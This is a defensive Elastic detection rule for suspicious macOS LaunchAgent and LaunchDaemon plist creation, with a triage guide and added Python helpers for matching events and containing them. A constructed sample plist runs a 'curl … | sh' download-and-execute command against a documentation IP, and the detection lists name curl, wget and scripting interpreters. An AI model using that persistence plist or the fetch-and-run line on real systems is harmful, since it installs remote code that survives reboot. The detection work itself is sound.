Persistence via Suspicious Launch Agent or Launch Daemon

Identifies the creation of a launch agent or daemon property list file containing abnormal or suspicious values. An adversary may establish persistence by installing a new launch agent (run when a user logs in) or launch daemon (run at system boot). This rule looks for plist files created in LaunchAgents/LaunchDaemons directories by processes running from paths commonly used by malware, or by scripting interpreters and download utilities.

Elastic rule (View on GitHub)

[metadata]
creation_date = "2026/01/30"
integration = ["endpoint"]
maturity = "production"
updated_date = "2026/01/30"

[rule]
author = ["Elastic"]
description = """
Identifies the creation of a launch agent or daemon property list file containing abnormal or suspicious
values. An adversary may establish persistence by installing a new launch agent or daemon which executes
at login. This rule looks for plist files created in LaunchAgents/LaunchDaemons directories with paths
commonly used by malware.
"""
from = "now-9m"
index = ["logs-endpoint.events.file-*"]
language = "eql"
license = "Elastic License v2"
name = "Persistence via Suspicious Launch Agent or Launch Daemon"
references = [
    "https://medium.com/red-teaming-with-a-blue-team-mentality/a-brief-look-at-macos-detections-and-post-infection-analysis-b0ede7ecfeb9",
    "https://objective-see.org/blog",
    "https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket"
]
risk_score = 73
rule_id = "62ba8542-1246-4647-9b84-98aa1bc0760a"
severity = "high"
tags = [
    "Domain: Endpoint",
    "OS: macOS",
    "Use Case: Threat Detection",
    "Tactic: Persistence",
    "Data Source: Elastic Defend",
    "Resources: Investigation Guide"
]
timestamp_override = "event.ingested"
type = "eql"
note = """## Triage and analysis

> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

### Investigating Persistence via Suspicious Launch Agent or Launch Daemon

LaunchAgents and LaunchDaemons are the standard macOS mechanisms for starting programs automatically at user login or system boot. While essential for legitimate software, these persistence mechanisms are heavily abused by malware including RustBucket (DPRK), Shlayer, and CloudMensis. This detection rule identifies plist file creation in LaunchAgent/LaunchDaemon directories when performed by suspicious processes including scripts executing from temporary directories, unsigned binaries, or scripting interpreters like Python and osascript.

### Possible investigation steps

- Examine the file.path to identify the specific plist file created and its location (user vs system LaunchAgent/LaunchDaemon directory).
- Read the plist contents using plutil or defaults to identify the Program or ProgramArguments configured for execution.
- Analyze the process.executable to understand what created the plist file and assess whether execution from that location (temp directory, hidden folder) is suspicious.
- Check the process.name and process.code_signature fields to determine if the creating process was a scripting interpreter or unsigned binary.
- Locate the binary or script referenced in the plist and calculate its hash for threat intelligence lookups.
- Review the parent process chain to trace back to the initial execution vector that led to plist creation.
- Correlate with other file and process events to identify additional malware components that may have been deployed simultaneously.

### False positive analysis

- Legitimate software installers may create LaunchAgents/LaunchDaemons during setup, but typically from signed installer processes rather than scripts in temp directories.
- Development and testing environments may use scripting languages to create launch items. Verify with development teams if such activities are expected.
- Several legitimate signing IDs are already excluded including vim, JetBrains Toolbox, and Sublime Text.
- System utilities like cfprefsd may modify plist files during normal operations and are excluded.
- Enterprise deployment tools may use scripts to configure launch items. Document and exclude approved deployment processes.

### Response and remediation

- Immediately unload the suspicious LaunchAgent or LaunchDaemon using launchctl unload with the plist path.
- Remove the malicious plist file from the LaunchAgent or LaunchDaemon directory.
- Locate and remove the executable or script referenced in the plist's Program or ProgramArguments keys.
- Check for other persistence mechanisms that may have been deployed by the same threat actor.
- Review system logs for evidence of the persistence mechanism executing and what actions it performed.
- If the detection matches patterns of known malware families (RustBucket, Shlayer), perform comprehensive IOC searches and threat hunting.
- Reset any credentials that may have been accessed while the malicious process was running.
- Monitor for recreation of similar plist files to detect persistent access or ongoing compromise.
"""
query = '''
file where host.os.type == "macos" and event.type != "deletion" and
  file.extension == "plist" and
  file.path like ("/Library/LaunchAgents/*", "/Library/LaunchDaemons/*",
                  "/Users/*/Library/LaunchAgents/*", "/System/Library/LaunchAgents/*",
                  "/System/Library/LaunchDaemons/*") and
  (process.executable like ("/private/tmp/*", "/private/var/root/Library/*", "/var/tmp/*",
                            "/tmp/*", "/var/folders/*", "/Users/Shared/*", "/var/root/*",
                            "/Library/WebServer/*", "/Library/Graphics/*", "/Library/Fonts/*") or
   process.name like~ ("python*", "osascript", "bash", "zsh", "sh", "curl", "nscurl", "wget", "java")) and
  not process.executable like ("/System/*", "/Library/PrivilegedHelperTools/*") and
  not (process.code_signature.signing_id in ("com.apple.vim", "com.apple.cat", "com.apple.cfprefsd",
                                            "com.jetbrains.toolbox", "com.apple.pico", "com.apple.shove",
                                            "com.sublimetext.4", "com.apple.ditto") and process.code_signature.trusted == true)
'''

[[rule.threat]]
framework = "MITRE ATT&CK"

  [rule.threat.tactic]
  name = "Persistence"
  id = "TA0003"
  reference = "https://attack.mitre.org/tactics/TA0003/"

  [[rule.threat.technique]]
  name = "Boot or Logon Autostart Execution"
  id = "T1547"
  reference = "https://attack.mitre.org/techniques/T1547/"

    [[rule.threat.technique.subtechnique]]
    name = "Plist Modification"
    id = "T1547.011"
    reference = "https://attack.mitre.org/techniques/T1547/011/"

  [[rule.threat.technique]]
  name = "Create or Modify System Process"
  id = "T1543"
  reference = "https://attack.mitre.org/techniques/T1543/"

    [[rule.threat.technique.subtechnique]]
    name = "Launch Agent"
    id = "T1543.001"
    reference = "https://attack.mitre.org/techniques/T1543/001/"

    [[rule.threat.technique.subtechnique]]
    name = "Launch Daemon"
    id = "T1543.004"
    reference = "https://attack.mitre.org/techniques/T1543/004/"

Triage and analysis

Disclaimer: This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

Investigating Persistence via Suspicious Launch Agent or Launch Daemon

LaunchAgents and LaunchDaemons are the standard macOS mechanisms for starting programs automatically at user login (agents) or system boot (daemons). While essential for legitimate software, these persistence mechanisms are heavily abused by malware including RustBucket (DPRK), Shlayer, and CloudMensis. This detection rule identifies plist file creation in LaunchAgent/LaunchDaemon directories when the writing process either runs from a temporary or otherwise unusual directory (/tmp, /var/folders, /Users/Shared, /var/root and similar) or is a scripting interpreter or download utility such as Python, osascript, bash, zsh, curl, wget or java. Processes under /System and /Library/PrivilegedHelperTools are excluded, as are a short list of known signing IDs, but the signing-ID exclusion applies only when the code signature is trusted, so a binary that merely claims one of those identifiers still fires.
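The query's predicate, re-implemented in Python so it can be run over sample file events offline. This is an added example and not Elastic's code: the field names follow the ECS fields used in the query, the sample events are constructed, and EQL's `like`/`like~` is approximated with `*` and `?` as the only wildcards (whole-string, case-sensitive unless `~`).

```python
import re

# Patterns copied from the rule's query.
LAUNCH_DIRS = ("/Library/LaunchAgents/*", "/Library/LaunchDaemons/*",
               "/Users/*/Library/LaunchAgents/*", "/System/Library/LaunchAgents/*",
               "/System/Library/LaunchDaemons/*")
SUSPICIOUS_EXEC_DIRS = ("/private/tmp/*", "/private/var/root/Library/*", "/var/tmp/*",
                        "/tmp/*", "/var/folders/*", "/Users/Shared/*", "/var/root/*",
                        "/Library/WebServer/*", "/Library/Graphics/*", "/Library/Fonts/*")
INTERPRETERS = ("python*", "osascript", "bash", "zsh", "sh", "curl", "nscurl", "wget", "java")
EXCLUDED_EXEC_DIRS = ("/System/*", "/Library/PrivilegedHelperTools/*")
EXCLUDED_SIGNING_IDS = {"com.apple.vim", "com.apple.cat", "com.apple.cfprefsd",
                        "com.jetbrains.toolbox", "com.apple.pico", "com.apple.shove",
                        "com.sublimetext.4", "com.apple.ditto"}


def like(value, patterns, case_insensitive=False):
    """EQL `like` (or `like~` when case_insensitive): '*' and '?' wildcards, whole-string match."""
    if value is None:
        return False
    flags = re.IGNORECASE if case_insensitive else 0
    for pattern in patterns:
        regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
        if re.fullmatch(regex, value, flags):
            return True
    return False


def matches_rule(event):
    """True when a file event satisfies every clause of the rule's query."""
    if event.get("host.os.type") != "macos" or event.get("event.type") == "deletion":
        return False
    if event.get("file.extension") != "plist" or not like(event.get("file.path"), LAUNCH_DIRS):
        return False
    exe = event.get("process.executable")
    # Either the writer runs from a path malware favours, or it is an interpreter/downloader.
    if not (like(exe, SUSPICIOUS_EXEC_DIRS)
            or like(event.get("process.name"), INTERPRETERS, case_insensitive=True)):
        return False
    if like(exe, EXCLUDED_EXEC_DIRS):
        return False
    # The signing-ID allow-list only applies when the signature validated as trusted:
    # a binary that merely claims an excluded identifier still fires.
    if (event.get("process.code_signature.signing_id") in EXCLUDED_SIGNING_IDS
            and event.get("process.code_signature.trusted") is True):
        return False
    return True


def _event(name, path, exe, proc, signing_id, trusted, event_type="creation", ext="plist"):
    return {"id": name, "host.os.type": "macos", "event.type": event_type,
            "file.path": path, "file.extension": ext, "process.executable": exe,
            "process.name": proc, "process.code_signature.signing_id": signing_id,
            "process.code_signature.trusted": trusted}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    _event("python-user-agent", "/Users/alice/Library/LaunchAgents/com.updater.helper.plist",
           "/usr/bin/python3", "python3", "com.apple.python3", True),
    _event("osascript-daemon", "/Library/LaunchDaemons/com.example.sync.plist",
           "/usr/bin/osascript", "osascript", "com.apple.osascript", True),
    _event("dropper-in-tmp", "/Users/alice/Library/LaunchAgents/.hidden.plist",
           "/private/tmp/.cache/dropper", "dropper", None, False),
    _event("trusted-jetbrains", "/Users/bob/Library/LaunchAgents/com.jetbrains.toolbox.plist",
           "/var/folders/x1/T/jetbrains-toolbox", "jetbrains-toolbox", "com.jetbrains.toolbox", True),
    _event("spoofed-jetbrains", "/Users/bob/Library/LaunchAgents/com.jetbrains.toolbox.plist",
           "/var/folders/x1/T/jetbrains-toolbox", "jetbrains-toolbox", "com.jetbrains.toolbox", False),
    _event("pkg-installer", "/Library/LaunchDaemons/com.vendor.updater.plist",
           "/usr/sbin/installer", "installer", "com.apple.installer", True),
    _event("bash-deletion", "/Library/LaunchAgents/com.example.old.plist",
           "/bin/bash", "bash", "com.apple.bash", True, event_type="deletion"),
    _event("python-under-system", "/Library/LaunchAgents/com.example.py.plist",
           "/System/Library/Frameworks/Python.framework/Versions/3.9/Resources/Python.app/Contents/MacOS/Python",
           "Python", "com.apple.python3", True),
    _event("not-a-plist", "/Library/LaunchDaemons/notes.txt",
           "/tmp/stage/run.sh", "sh", None, False, ext="txt"),
]


def fired(events=SAMPLE_EVENTS):
    """IDs of the sample events the rule would alert on."""
    return [e["id"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    for event_id in fired():
        print("ALERT", event_id)
```

Of the nine constructed events only four fire: the interpreter writes, the dropper running out of /private/tmp, and the JetBrains-signed binary whose signature did not validate. The installer, the deletion, the interpreter living under /System and the non-plist file are all filtered by the query's other clauses.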

Possible investigation steps

  • Examine the file.path to identify the specific plist file created and its location (user vs system LaunchAgent/LaunchDaemon directory).
  • Read the plist contents (plutil -p <file> or defaults read <file>) to identify the Label and the Program or ProgramArguments that launchd will execute, and whether RunAtLoad, KeepAlive or StartInterval keeps the job running.
  • Analyze the process.executable to understand what created the plist file and assess whether execution from that location (temp directory, hidden folder) is suspicious.
  • Check the process.name and process.code_signature fields to determine if the creating process was a scripting interpreter or unsigned binary.
  • Locate the binary or script referenced in the plist and calculate its hash for threat intelligence lookups.
  • Review the parent process chain to trace back to the initial execution vector that led to plist creation.
  • Correlate with other file and process events to identify additional malware components that may have been deployed simultaneously.

False positive analysis

  • Legitimate software installers may create LaunchAgents/LaunchDaemons during setup, but typically from signed installer processes rather than scripts in temp directories.
  • Development and testing environments may use scripting languages to create launch items. Verify with development teams if such activities are expected.
  • Several legitimate signing IDs are already excluded including vim, JetBrains Toolbox, and Sublime Text.
  • System utilities like cfprefsd may modify plist files during normal operations and are excluded.
  • Enterprise deployment tools may use scripts to configure launch items. Document and exclude approved deployment processes.

Response and remediation

  • Immediately unload the suspicious LaunchAgent or LaunchDaemon before deleting anything: on current macOS use launchctl bootout with the launchd domain and the plist path (gui/<uid> for agents, system for daemons); the legacy form is launchctl unload with the plist path. Deleting the plist alone leaves the already-loaded job running until the next logout or reboot.
  • Remove the malicious plist file from the LaunchAgent or LaunchDaemon directory.
  • Locate and remove the executable or script referenced in the plist's Program or ProgramArguments keys.
  • Check for other persistence mechanisms that may have been deployed by the same threat actor.
  • Review system logs for evidence of the persistence mechanism executing and what actions it performed.
  • If the detection matches patterns of known malware families (RustBucket, Shlayer), perform comprehensive IOC searches and threat hunting.
  • Reset any credentials that may have been accessed while the malicious process was running.
  • Monitor for recreation of similar plist files to detect persistent access or ongoing compromise.
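A triage and containment helper covering the investigation steps (read the plist, find the launch target, flag traits worth escalating, hash the target) and the response steps (unload in the right launchd domain, then remove the plist and the payload). This is an added example, not Elastic's code: the two sample plists and their paths are constructed, 198.51.100.7 is a documentation address, the trait list is illustrative, and the generated commands are returned as strings for an analyst to review rather than executed.

```python
import hashlib
import os
import plistlib
import re
import shlex

SUSPICIOUS_PROGRAM_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/folders/",
                           "/Users/Shared/", "/Library/WebServer/", "/Library/Fonts/")
INTERPRETERS = {"osascript", "bash", "zsh", "sh", "curl", "nscurl", "wget", "java"}
SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/usr/", "/System/")
DOWNLOAD_PIPE = re.compile(r"\b(curl|wget|nscurl)\b[^|]*\|\s*(sh|bash|zsh|python\S*)\b")

def launch_target(plist):
    """launchd executes Program when set, otherwise ProgramArguments[0]."""
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    return plist.get("Program") or (args[0] if args else None), args

def is_interpreter(program):
    base = os.path.basename(program).lower()
    return base in INTERPRETERS or base.startswith("python")

def suspicious_traits(plist, plist_path):
    """Traits an analyst would escalate on; illustrative, not exhaustive."""
    program, args = launch_target(plist)
    if program is None:
        return ["no Program or ProgramArguments"]
    traits = []
    if program.startswith(SUSPICIOUS_PROGRAM_DIRS):
        traits.append("program in temp or shared directory")
    if any(part.startswith(".") for part in program.split("/")[1:]):
        traits.append("hidden path component in program")
    if is_interpreter(program):
        traits.append(f"interpreter as launch target: {program}")
    joined = " ".join(args)
    if DOWNLOAD_PIPE.search(joined):
        traits.append("download-and-execute pipeline")
    if re.search(r"base64\s+(-d|-D|--decode)\b", joined):
        traits.append("base64-decoded payload")
    if str(plist.get("Label", "")).startswith("com.apple.") and not plist_path.startswith("/System/"):
        traits.append("Apple-looking label outside /System")
    return traits

def sha256_if_present(path):
    """Hash for threat-intel lookups; None if the target is already gone from disk."""
    if not path or not os.path.isfile(path):
        return None
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def launchd_domain(plist_path, uid=None):
    """Domain target for `launchctl bootout`: daemons live in the system domain, agents in the
    gui domain of the user they run as (every logged-in user for /Library/LaunchAgents)."""
    if plist_path.startswith(("/Library/LaunchDaemons/", "/System/Library/LaunchDaemons/")):
        return "system"
    m = re.match(r"/Users/([^/]+)/Library/LaunchAgents/", plist_path)
    if m:
        return f"gui/{uid}" if uid is not None else f"gui/$(id -u {shlex.quote(m.group(1))})"
    if plist_path.startswith(("/Library/LaunchAgents/", "/System/Library/LaunchAgents/")):
        return f"gui/{uid}" if uid is not None else "gui/$(id -u)"
    raise ValueError(f"not a launchd job directory: {plist_path}")

def triage(plist_bytes, plist_path, uid=None):
    plist = plistlib.loads(plist_bytes)
    program, args = launch_target(plist)
    # bootout before rm: deleting the plist alone leaves the already-loaded job running.
    commands = [f"sudo launchctl bootout {launchd_domain(plist_path, uid)} {shlex.quote(plist_path)}",
                f"sudo rm -f {shlex.quote(plist_path)}"]
    # Only remove the target when it is the payload itself. If launchd runs an interpreter or
    # another system binary, the payload is the script or inline command in ProgramArguments.
    if program and not is_interpreter(program) and not program.startswith(SYSTEM_PREFIXES):
        commands.append(f"sudo rm -f {shlex.quote(program)}")
    return {"label": plist.get("Label"), "program": program, "args": args,
            "run_at_load": bool(plist.get("RunAtLoad")), "keep_alive": bool(plist.get("KeepAlive")),
            "traits": suspicious_traits(plist, plist_path),
            "sha256": sha256_if_present(program), "commands": commands}

# Constructed samples (not real malware). 198.51.100.7 is a documentation address.
SAMPLE_AGENT_PATH = "/Users/alice/Library/LaunchAgents/com.apple.cloud.update.plist"
SAMPLE_AGENT_PLIST = plistlib.dumps({
    "Label": "com.apple.cloud.update",
    "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://198.51.100.7/p | sh"],
    "RunAtLoad": True, "KeepAlive": True})
SAMPLE_DAEMON_PATH = "/Library/LaunchDaemons/com.sysupdate.agent.plist"
SAMPLE_DAEMON_PLIST = plistlib.dumps({
    "Label": "com.sysupdate.agent", "Program": "/Users/Shared/.sysupdate/agent",
    "ProgramArguments": ["/Users/Shared/.sysupdate/agent", "--silent"],
    "RunAtLoad": True, "StartInterval": 300})

if __name__ == "__main__":
    for path, blob in ((SAMPLE_AGENT_PATH, SAMPLE_AGENT_PLIST), (SAMPLE_DAEMON_PATH, SAMPLE_DAEMON_PLIST)):
        print(path, triage(blob, path, uid=501), sep="\n  ")
```

Two details worth keeping when adapting this: the bootout domain is derived from the plist location, not from the Label, and the helper refuses to propose removing an interpreter or other system binary as the "payload", because for a `/bin/sh -c` job the thing to remove is what the inline command fetched, not sh itself.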
